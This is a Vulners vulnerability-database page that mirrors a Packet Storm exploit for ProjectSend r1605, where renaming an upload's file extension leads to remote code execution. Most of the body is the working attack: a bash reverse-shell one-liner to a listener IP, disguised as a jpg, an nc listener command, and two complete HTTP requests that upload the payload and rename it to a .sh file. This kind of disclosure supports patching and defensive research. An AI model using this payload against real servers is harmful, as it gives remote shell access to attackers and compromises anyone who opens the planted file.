Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

projectSend r1605 Remote Code Execution

🗓️ 05 Apr 2023 00:00:00Reported by Mirabbas AgalarovType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 221 Views

projectSend r1605 Remote Code Execution RCE via File Extension Manipulation in PHP Applicatio

Code
`Exploit Title: projectSend r1605 - Remote Code Exectution RCE  
Application: projectSend  
Version: r1605  
Bugs: rce via file extension manipulation  
Technology: PHP  
Vendor URL: https://www.projectsend.org/  
Software Link: https://www.projectsend.org/  
Date of found: 26-01-2023  
Author: Mirabbas Ağalarov  
Tested on: Linux   
POC video: https://youtu.be/Ln7KluDfnk4  
  
2. Technical Details & POC  
========================================  
  
1.The attacker first creates a txt file and pastes the following code. Next, the Attacker changes the file extension to jpg. Because the system php,sh,exe etc. It does not allow files.   
  
bash -i >& /dev/tcp/192.168.100.18/4444 0>&1  
  
2.Then the attacker starts listening for ip and port   
nc -lvp 4444  
  
3.and when uploading file it makes http request as below.file name should be like this openme.sh;jpg  
  
  
  
POST /includes/upload.process.php HTTP/1.1  
Host: localhost  
Content-Length: 525  
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"  
sec-ch-ua-platform: "Linux"  
sec-ch-ua-mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary0enbZuQQAtahFVjI  
Accept: */*  
Origin: http://localhost  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: http://localhost/upload.php  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: download_started=false; PHPSESSID=jtk7d0nats7nb1r5rjm7a6kj59  
Connection: close  
  
------WebKitFormBoundary0enbZuQQAtahFVjI  
Content-Disposition: form-data; name="name"  
  
openme.sh;jpg  
------WebKitFormBoundary0enbZuQQAtahFVjI  
Content-Disposition: form-data; name="chunk"  
  
0  
------WebKitFormBoundary0enbZuQQAtahFVjI  
Content-Disposition: form-data; name="chunks"  
  
1  
------WebKitFormBoundary0enbZuQQAtahFVjI  
Content-Disposition: form-data; name="file"; filename="blob"  
Content-Type: application/octet-stream  
  
bash -i >& /dev/tcp/192.168.100.18/4444 0>&1  
  
------WebKitFormBoundary0enbZuQQAtahFVjI--  
  
  
4.In the second request, we do this to the filename section at the bottom.  
  
openme.sh  
  
  
POST /files-edit.php?ids=34 HTTP/1.1  
Host: localhost  
Content-Length: 1016  
Cache-Control: max-age=0  
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"  
sec-ch-ua-mobile: ?0  
sec-ch-ua-platform: "Linux"  
Upgrade-Insecure-Requests: 1  
Origin: http://localhost  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryc8btjvyb3An7HcmA  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: navigate  
Sec-Fetch-User: ?1  
Sec-Fetch-Dest: document  
Referer: http://localhost/files-edit.php?ids=34&type=new  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: download_started=false; PHPSESSID=jtk7d0nats7nb1r5rjm7a6kj59  
Connection: close  
  
------WebKitFormBoundaryc8btjvyb3An7HcmA  
Content-Disposition: form-data; name="csrf_token"  
  
66540808a4bd64c0f0566e6c20a4bc36c49dfac41172788424c6924b15b18d02  
------WebKitFormBoundaryc8btjvyb3An7HcmA  
Content-Disposition: form-data; name="file[1][id]"  
  
34  
------WebKitFormBoundaryc8btjvyb3An7HcmA  
Content-Disposition: form-data; name="file[1][original]"  
  
openme.sh;.jpg  
------WebKitFormBoundaryc8btjvyb3An7HcmA  
Content-Disposition: form-data; name="file[1][file]"  
  
1674759035-52e51cf3f58377b8a687d49b960a58dfc677f0ad-openmesh.jpg  
------WebKitFormBoundaryc8btjvyb3An7HcmA  
Content-Disposition: form-data; name="file[1][name]"  
  
openme.sh  
------WebKitFormBoundaryc8btjvyb3An7HcmA  
Content-Disposition: form-data; name="file[1][description]"  
  
  
------WebKitFormBoundaryc8btjvyb3An7HcmA  
Content-Disposition: form-data; name="file[1][expiry_date]"  
  
25-02-2023  
------WebKitFormBoundaryc8btjvyb3An7HcmA  
Content-Disposition: form-data; name="save"  
  
  
------WebKitFormBoundaryc8btjvyb3An7HcmA--  
  
  
And it doesn't matter who downloads your file. if it opens then reverse shell will be triggered and rce  
  
  
private youtube video poc : https://youtu.be/Ln7KluDfnk4  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
05 Apr 2023 00:00Current
6.8Medium risk
Vulners AI Score6.8
projectsendr1605remote code executionfile extension manipulationphplinuxexploitsecurity vulnerability
221